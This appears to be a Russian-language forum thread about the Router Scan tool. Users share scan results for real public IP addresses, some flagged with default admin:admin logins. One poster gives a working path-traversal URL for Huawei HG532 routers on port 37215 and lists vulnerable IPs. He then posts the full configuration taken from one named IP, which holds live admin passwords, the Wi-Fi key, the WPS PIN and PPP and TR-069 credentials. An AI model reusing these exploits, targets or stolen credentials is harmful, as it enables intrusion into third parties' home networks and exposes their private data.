прога Router Scan

Пункт FAQ 2.6.

Да.

 

Нарвался на кучу роутеров FRITZ!Box. RS пароль опрелеляет, но инфу не достаёт. Вот список. FRITZ это те, где admin:admin

Spoiler: FRITS!Box

"IP Address";"Port";"Time (ms)";"Status";"Authorization";"Server name / Realm name / Device type";"Radio Off";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"LAN IP Address";"LAN Subnet Mask";"WAN IP Address";"WAN Subnet Mask";"WAN Gateway";"Domain Name Servers";"Latitude";"Longitude";"Comments"
"188.77.90.208";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.104.157";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.111.40";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.112.110";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.114.246";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.121.124";"443";"63";"Done";"support:<empty>";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.123.143";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.128.245";"443";"94";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.146.168";"443";"47";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.165.124";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.167.110";"443";"63";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.167.234";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.168.179";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.182.39";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.195.161";"443";"93";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.220.197";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.222.200";"443";"47";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.223.166";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.237.51";"443";"3058";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"188.77.245.208";"443";"172";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.1.203";"443";"109";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.2.3";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.3.215";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.9.36";"443";"94";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.9.243";"443";"78";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.40.25";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.52.168";"443";"93";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.55.164";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.60.77";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.64.185";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.67.241";"443";"93";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.80.249";"443";"265";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.84.89";"443";"156";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.84.158";"443";"156";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.88.121";"443";"78";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.90.39";"443";"140";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.104.39";"443";"109";"Done";"admin:admin";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.104.112";"443";"62";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.114.238";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.116.63";"443";"234";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.117.7";"443";"63";"Done";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""
"95.16.121.24";"443";"78";"Timed out";"";"HTTPS Access";"";"";"";"";"";"";"";"";"";"";"";"";"";"";"";""

 

@tamer010151 ну и зачем все модули сканирования включать? Боитесь что-то пропустить?

А ещё - версия на скриншоте определённо устарела, ZTE я исправлял.

 

Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается.

Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.

 

Ну вот у меня например 197.164.81.40 хоть и не логинится, но крякозябр в таблицу не пишет.

Ещё обратил внимание, что диапазон в целом тормозной, ширина канала очень мала на стороне сканируемого провайдера. Таким большим количеством потоков его нельзя сканировать, можно вообще положить.

 

binarymaster, заметил что ZTE Router (locked for 59 sec.) а пароль подбирается дальше и другие уязвимости проверяются.

 

Там еще два RS запущено.

 

У меня тут нарисовалась огромная куча Huawei. Предположительно это HG532e. По нему вот нашлось https://github.com/ud2/advisories/tree/master/embedded/huawei/cve-2015-7254
За пару минут нашел кучу устройств с открытым 37215. Это можно как то эксплуатировать?

http://image.prntscr.com/image/60406f1048824fc5bfca951565507232.png

 

Отвечаю сам себе. Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д.

Spoiler: Список IP с открытым 37215

95.19.223.26
95.19.230.185
95.19.233.233
95.19.235.197
188.76.55.156
188.76.63.94
188.76.65.250

Spoiler: Конфиг полученый с 95.19.230.185

Code:

<?xml version="1.0" ?>
<InternetGatewayDeviceConfig>
<InternetGatewayDevice>
<DeviceInfo ProvisioningCode="JAZZ">
<X_PortalManagement Enable="0" PortalUrl-Computer="" PortalUrl-STB="" PortalUrl-Phone=""/>
<X_ServiceManage FtpEnable="1" FtpUserName="ftp" FtpPassword="" FtpPort="21" FtpPath="/mnt" TelnetEnable="1" TelnetPort="23" SambaEnable="1"/>
</DeviceInfo>
<ManagementServer URL="https://acs.jazztel.com:8443" Username="" Password="" PeriodicInformEnable="1" PeriodicInformInterval="14400" ConnectionRequestUsername="9S5JJb5bnkbv" ConnectionRequestPassword="5Ms9EH3YkuXr" X_SSLCertEnable="0" X_ConnReqPort="8081">
<ObjExtention>
<Username Notify="0" AccList="1" Resv="0"/>
<URL Notify="0" AccList="1" Resv="0"/>
<PeriodicInformInterval Notify="0" AccList="1" Resv="0"/>
<PeriodicInformEnable Notify="0" AccList="1" Resv="0"/>
<Password Notify="0" AccList="1" Resv="0"/>
<ParameterKey Notify="0" AccList="1" Resv="0"/>
<ConnectionRequestUsername Notify="0" AccList="1" Resv="0"/>
<ConnectionRequestURL Notify="0" AccList="1" Resv="0"/>
<ConnectionRequestPassword Notify="0" AccList="1" Resv="0"/>
</ObjExtention>
</ManagementServer>
<Time Enable="1" NTPServer1="ntp1.jazztel.com" NTPServer2="ntp2.jazztel.com" NTPServer3="clock.sjc.he.net" NTPServer4="clock.via.net" NTPServer5="" LocalTimeZoneName="GMT+01:00" X_Label="29"/>
<UserInterface>
<X_Web Timeout="5">
<UserInfo NumberOfInstances="2">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin"/>
<UserInfoInstance InstanceID="2" Username="user" Userpassword="user"/>
</UserInfo>
</X_Web>
<X_Cli>
<UserInfo NumberOfInstances="1">
<UserInfoInstance InstanceID="1" Username="admin" Userpassword="admin" Userlevel="0"/>
</UserInfo>
</X_Cli>
</UserInterface>
<X_SyslogConfig Enable="0" Level="Debug" DisplayLevel="Debug" LogServerEnable="0" MainServer="" MainServerPort="514" MinorServer="" MinorServerPort="514"/>
<Layer3Forwarding X_AutoDefaultGatewayEnable="0" X_DefaultGatewayIPAddress="" DefaultConnectionService="">
</Layer3Forwarding>
<LANDevice NumberOfInstances="1">
<LANDeviceInstance InstanceID="1" X_WLANEnable="1">
<LANHostConfigManagement DHCPServerEnable="1" MinAddress="192.168.1.2" MaxAddress="192.168.1.254" ReservedAddresses="" DNSServers="185.55.218.219,8.8.8.8" DomainName="" IPRouters="" DHCPLeaseTime="86400">
<DHCPConditionalServingPool NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<DHCPConditionalServingPoolInstance InstanceID="1" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="STB" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/>
<DHCPConditionalServingPoolInstance InstanceID="2" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Phone" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/>
<DHCPConditionalServingPoolInstance InstanceID="3" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Camera" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/>
<DHCPConditionalServingPoolInstance InstanceID="4" Enable="1" MinAddress="0.0.0.0" MaxAddress="0.0.0.0" VendorClassID="Computer" X_DeviveDhcpRelay="0" X_DeviceDhcpType=""/>
</DHCPConditionalServingPool>
<IPInterface NumberOfInstances="1">
<IPInterfaceInstance InstanceID="1" Enable="0" IPInterfaceIPAddress="192.168.1.1" IPInterfaceSubnetMask="255.255.255.0" IPInterfaceAddressingType="DHCP" X_RouteProtocolRx="Off" X_RIPOperation="Active"/>
</IPInterface>
</LANHostConfigManagement>
<LANEthernetInterfaceConfig NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<LANEthernetInterfaceConfigInstance InstanceID="1" Enable="1">
</LANEthernetInterfaceConfigInstance>
<LANEthernetInterfaceConfigInstance InstanceID="2" Enable="1">
</LANEthernetInterfaceConfigInstance>
<LANEthernetInterfaceConfigInstance InstanceID="3" Enable="1">
</LANEthernetInterfaceConfigInstance>
<LANEthernetInterfaceConfigInstance InstanceID="4" Enable="1">
</LANEthernetInterfaceConfigInstance>
</LANEthernetInterfaceConfig>
<WLANConfiguration NumberOfInstances="4">
<WLANConfigurationInstance InstanceID="1" SSIDAdvertisementEnabled="1" Enable="1" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="ES" SSID="Jazztel_79" BeaconType="WPAand11i" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="16" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33">
<WPS Enable="0" X_WPSMode="ap-pbc" DevicePassword="01576702" PinPhrase=""/>
<WEPKey NumberOfInstances="4">
<WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/>
<WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/>
<WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/>
<WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/>
</WEPKey>
<PreSharedKey NumberOfInstances="1">
<PreSharedKeyInstance InstanceID="1" PreSharedKey="EMGB3CDA"/>
</PreSharedKey>
</WLANConfigurationInstance>
<WLANConfigurationInstance InstanceID="2" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_2" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33">
<WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/>
<WEPKey NumberOfInstances="4">
<WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/>
<WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/>
<WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/>
<WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/>
</WEPKey>
<PreSharedKey NumberOfInstances="1">
<PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/>
</PreSharedKey>
</WLANConfigurationInstance>
<WLANConfigurationInstance InstanceID="3" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_3" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33">
<WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/>
<WEPKey NumberOfInstances="4">
<WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/>
<WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/>
<WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/>
<WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/>
</WEPKey>
<PreSharedKey NumberOfInstances="1">
<PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/>
</PreSharedKey>
</WLANConfigurationInstance>
<WLANConfigurationInstance InstanceID="4" SSIDAdvertisementEnabled="1" Enable="0" MaxBitRate="Auto" Channel="6" AutoChannelEnable="1" RegulatoryDomain="GB" SSID="HG532c_4" BeaconType="Basic" MACAddressControlEnabled="0" Standard="b/g/n" WEPKeyIndex="1" WEPEncryptionLevel="104-bit" BasicEncryptionModes="None" BasicAuthenticationMode="None" WPAEncryptionModes="AESEncryption" WPAAuthenticationMode="PSKAuthentication" IEEE11iEncryptionModes="AESEncryption" IEEE11iAuthenticationMode="PSKAuthentication" WMMEnable="1" X_MixedEncryptionModes="AESEncryption" X_MixedAuthenticationMode="PSKAuthentication" X_PowerValue="20" X_AssociateDeviceNum="32" X_WlanMacFilterpolicy="0" X_WlanStaWakeEnable="0" X_WlanIsolateControl="0" X_Wlan11NBWControl="20" X_Wlan11NGIControl="long" X_Wlan11NHtMcs="33">
<WPS Enable="0" X_WPSMode="ap-pin" DevicePassword="01576702" PinPhrase=""/>
<WEPKey NumberOfInstances="4">
<WEPKeyInstance InstanceID="1" WEPKey="1111111111111"/>
<WEPKeyInstance InstanceID="2" WEPKey="2222222222222"/>
<WEPKeyInstance InstanceID="3" WEPKey="3333333333333"/>
<WEPKeyInstance InstanceID="4" WEPKey="4444444444444"/>
</WEPKey>
<PreSharedKey NumberOfInstances="1">
<PreSharedKeyInstance InstanceID="1" PreSharedKey="1234567890"/>
</PreSharedKey>
</WLANConfigurationInstance>
</WLANConfiguration>
<Hosts>
</Hosts>
</LANDeviceInstance>
</LANDevice>
<WANDevice NumberOfInstances="2">
<WANDeviceInstance InstanceID="1">
<WANCommonInterfaceConfig WANAccessType="DSL" Layer1UpstreamMaxBitRate="100000000" Layer1DownstreamMaxBitRate="100000000">
</WANCommonInterfaceConfig>
<WANDSLInterfaceConfig Enable="1" X_ConfigMode="ALL">
<Stats>
</Stats>
</WANDSLInterfaceConfig>
<X_WANUMTSInterfaceConfig Enable="1">
</X_WANUMTSInterfaceConfig>
<WANConnectionDevice NumberOfInstances="1">
<ObjExtention MaxInstanceNum="4"/>
<WANConnectionDeviceInstance InstanceID="1">
<ObjExtention>
<WANPPPConnectionNumberOfEntries Notify="0" AccList="1" Resv="0"/>
</ObjExtention>
<X_WANUMTSLinkConfig Enable="0"/>
<WANDSLLinkConfig Enable="1" LinkType="EoA" DestinationAddress="PVC:8/35" ATMEncapsulation="LLC" ATMQoS="UBR" ATMPeakCellRate="0" ATMMaximumBurstSize="0" ATMSustainableCellRate="0" X_VLANIDMark="-1" X_802-1pMark="-1">
<ObjExtention>
<LinkType Notify="0" AccList="1" Resv="0"/>
<DestinationAddress Notify="0" AccList="1" Resv="0"/>
</ObjExtention>
</WANDSLLinkConfig>
<WANPPPConnection NumberOfInstances="1">
<WANPPPConnectionInstance InstanceID="1" Enable="1" PossibleConnectionTypes="IP_Routed,PPPoE_Bridged,DHCP_Spoofed" ConnectionType="IP_Routed" Name="" AutoDisconnectTime="0" IdleDisconnectTime="0" NATEnabled="1" Username="hg532c@jazztel" Password="hg532c" PPPAuthenticationProtocol="AUTO" MaxMRUSize="1492" MaxMTUSize="1492" X_TCP_MSS="0" DNSEnabled="1" DNSOverrideAllowed="1" DNSServers="" MACAddress="" MACAddressOverride="0" PPPoEACName="" PPPoEServiceName="" ConnectionTrigger="AlwaysOn" RouteProtocolRx="Off" X_RIPOperation="Passive" X_LanInterface="" X_ServiceList="INTERNET_TR069" X_DHCPRelay="0" X_APN="" X_DialNumber="" X_BackupDNSServers="87.216.1.65,87.216.1.66">
<ObjExtention>
<Username Notify="0" AccList="1" Resv="0"/>
<RouteProtocolRx Notify="0" AccList="1" Resv="0"/>
<Password Notify="0" AccList="1" Resv="0"/>
<PPPoEServiceName Notify="0" AccList="1" Resv="0"/>
<PPPAuthenticationProtocol Notify="0" AccList="1" Resv="0"/>
<Name Notify="0" AccList="1" Resv="0"/>
<NATEnabled Notify="0" AccList="1" Resv="0"/>
<Enable Notify="0" AccList="1" Resv="0"/>
<DNSOverrideAllowed Notify="0" AccList="1" Resv="0"/>
<DNSEnabled Notify="0" AccList="1" Resv="0"/>
<CurrentMRUSize Notify="0" AccList="1" Resv="0"/>
<ConnectionType Notify="0" AccList="1" Resv="0"/>
</ObjExtention>
<PortMapping NumberOfInstances="3">
<ObjExtention MaxInstanceNum="4"/>
<PortMappingInstance InstanceID="1" PortMappingEnabled="1" RemoteHost="" ExternalPort="4662" ExternalPortEndRange="4662" InternalPort="4662" PortMappingProtocol="TCP" InternalClient="192.168.1.128" PortMappingDescription="eMule_TCP"/>
<PortMappingInstance InstanceID="2" PortMappingEnabled="1" RemoteHost="" ExternalPort="4672" ExternalPortEndRange="4672" InternalPort="4672" PortMappingProtocol="UDP" InternalClient="192.168.1.128" PortMappingDescription="eMule_UDP"/>
<PortMappingInstance InstanceID="4" PortMappingEnabled="1" RemoteHost="" ExternalPort="17740" ExternalPortEndRange="17740" InternalPort="17740" PortMappingProtocol="TCP/UDP" InternalClient="192.168.1.128" PortMappingDescription="Bit Comet"/>
</PortMapping>
<X_DMZ DMZEnable="0" DMZHostIPAddress=""/>
</WANPPPConnectionInstance>
</WANPPPConnection>
</WANConnectionDeviceInstance>
</WANConnectionDevice>
</WANDeviceInstance>
<WANDeviceInstance InstanceID="2">
<WANCommonInterfaceConfig WANAccessType="UMTS" Layer1UpstreamMaxBitRate="100000000" Layer1DownstreamMaxBitRate="100000000">
</WANCommonInterfaceConfig>
<WANDSLInterfaceConfig Enable="1" X_ConfigMode="ALL">
<Stats>
</Stats>
</WANDSLInterfaceConfig>
<X_WANUMTSInterfaceConfig Enable="1">
</X_WANUMTSInterfaceConfig>
<WANConnectionDevice NumberOfInstances="1">
<ObjExtention MaxInstanceNum="4"/>
<WANConnectionDeviceInstance InstanceID="1">
<X_WANUMTSLinkConfig Enable="1"/>
<WANDSLLinkConfig Enable="1" LinkType="" DestinationAddress="" ATMEncapsulation="LLC" ATMQoS="UBR" ATMPeakCellRate="0" ATMMaximumBurstSize="0" ATMSustainableCellRate="0" X_VLANIDMark="-1" X_802-1pMark="-1"/>
<WANPPPConnection NumberOfInstances="1">
<WANPPPConnectionInstance InstanceID="1" Enable="1" PossibleConnectionTypes="IP_Routed,PPPoE_Bridged,DHCP_Spoofed" ConnectionType="IP_Routed" Name="UMTS" AutoDisconnectTime="0" IdleDisconnectTime="0" NATEnabled="1" Username="abc" Password="123" PPPAuthenticationProtocol="AUTO" MaxMRUSize="1492" MaxMTUSize="1492" X_TCP_MSS="0" DNSEnabled="1" DNSOverrideAllowed="1" DNSServers="" MACAddress="" MACAddressOverride="0" PPPoEACName="" PPPoEServiceName="" ConnectionTrigger="AlwaysOn" RouteProtocolRx="Off" X_RIPOperation="Active" X_LanInterface="" X_ServiceList="INTERNET" X_DHCPRelay="0" X_APN="1234" X_DialNumber="*99#" X_BackupDNSServers="87.216.1.65,87.216.1.66">
<X_DMZ DMZEnable="0" DMZHostIPAddress=""/>
</WANPPPConnectionInstance>
</WANPPPConnection>
</WANConnectionDeviceInstance>
</WANConnectionDevice>
</WANDeviceInstance>
</WANDevice>
<Layer2Bridging>
<Bridge NumberOfInstances="1">
<BridgeInstance InstanceID="1" BridgeName="br0"/>
</Bridge>
</Layer2Bridging>
<Services>
<X_ALGAbility H323Enable="1" SIPEnable="0" SIPPort="5060" SIPWanPath="" RTSPEnable="1" L2TPEnable="1" IPSECEnable="1" PPTPEnable="1"/>
<X_IPTV IGMPProxyEnable="0" IGMPSnoopingEnable="0" GroupNumber="32" WanList="" DownVersion="2"/>
<X_UPnP Enable="0" TR064ConfigPwd="admin"/>
<X_DmsService Enable="0" ContentDirectory="" ContentDirectoryUTF=""/>
<X_Mirror Enable="0" LanInterface=""/>
</Services>
<X_FireWall CurrentLevel="Disable">
<FilterMode NumberOfInstances="7">
<ObjExtention MaxInstanceNum="7"/>
<FilterModeInstance InstanceID="1" Level="Disable" Revisable="0" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/>
</FilterModeInstance>
<FilterModeInstance InstanceID="2" Level="Block-All" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="1">
<IpFilterInstance InstanceID="1" Name="Block" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<DosAttack SynFlooding="1" IcmpFlooding="0" ArpAttack="1"/>
<ACL NumberOfInstances="1">
<ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
</ACL>
</FilterModeInstance>
<FilterModeInstance InstanceID="3" Level="High" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="1">
<IpFilterInstance InstanceID="1" Name="High-Ip" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<AppFilter NumberOfInstances="3">
<ObjExtention MaxInstanceNum="3"/>
<AppFilterInstance InstanceID="1" Name="DNS" Status="1" Protocol="UDP" Port="53"/>
<AppFilterInstance InstanceID="2" Name="FTP" Status="1" Protocol="TCP" Port="21"/>
<AppFilterInstance InstanceID="3" Name="HTTP" Status="1" Protocol="TCP" Port="80"/>
</AppFilter>
<DosAttack SynFlooding="1" IcmpFlooding="0" ArpAttack="1"/>
<ACL NumberOfInstances="1">
<ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
</ACL>
</FilterModeInstance>
<FilterModeInstance InstanceID="4" Level="Medium" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="1">
<IpFilterInstance InstanceID="1" Name="Middle-Ip" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<AppFilter NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<AppFilterInstance InstanceID="1" Name="DNS" Status="1" Protocol="UDP" Port="53"/>
<AppFilterInstance InstanceID="2" Name="FTP" Status="1" Protocol="TCP" Port="21"/>
<AppFilterInstance InstanceID="3" Name="HTTP" Status="1" Protocol="TCP" Port="80"/>
<AppFilterInstance InstanceID="4" Name="File Share" Status="1" Protocol="TCP/UDP" Port="137-139,445"/>
</AppFilter>
<DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/>
<ACL NumberOfInstances="1">
<ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
</ACL>
</FilterModeInstance>
<FilterModeInstance InstanceID="5" Level="Low" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="2">
<ObjExtention MaxInstanceNum="2"/>
<IpFilterInstance InstanceID="1" Name="Low-Lan" Status="1" Priority="255" Interface="br0" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
<IpFilterInstance InstanceID="2" Name="Low-All" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<DosAttack SynFlooding="0" IcmpFlooding="1" ArpAttack="0"/>
<ACL NumberOfInstances="5">
<ObjExtention MaxInstanceNum="5"/>
<ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="2" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="3" X_Service="TELNET" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="4" X_Service="HTTP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="5" X_Service="ICMP" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/>
</ACL>
</FilterModeInstance>
<FilterModeInstance InstanceID="6" Level="Standard" Revisable="2" TotalNumberOfEntries="0" MacFilterPolicy="0" UrlFilterPolicy="0">
<IpFilter NumberOfInstances="2">
<ObjExtention MaxInstanceNum="2"/>
<IpFilterInstance InstanceID="1" Name="Std-Lan" Status="1" Priority="255" Interface="br0" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
<IpFilterInstance InstanceID="2" Name="Std-All" Status="2" Priority="255" Interface="ALL" SourceIPStart="" SourceIPEnd="" DestIPStart="" DestIPEnd="" Protocol="ALL" SourcePortStart="0" SourcePortEnd="0" DestPortStart="0" DestPortEnd="0"/>
</IpFilter>
<DosAttack SynFlooding="0" IcmpFlooding="0" ArpAttack="0"/>
<ACL NumberOfInstances="4">
<ObjExtention MaxInstanceNum="4"/>
<ACLInstance InstanceID="1" X_Service="HTTP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="2" X_Service="ICMP" X_Direction="LAN" X_StartIpAddr="" X_EndIpAddr=""/>
<ACLInstance InstanceID="3" X_Service="ACS" X_Direction="WAN" X_StartIpAddr="" X_EndIpAddr=""/>
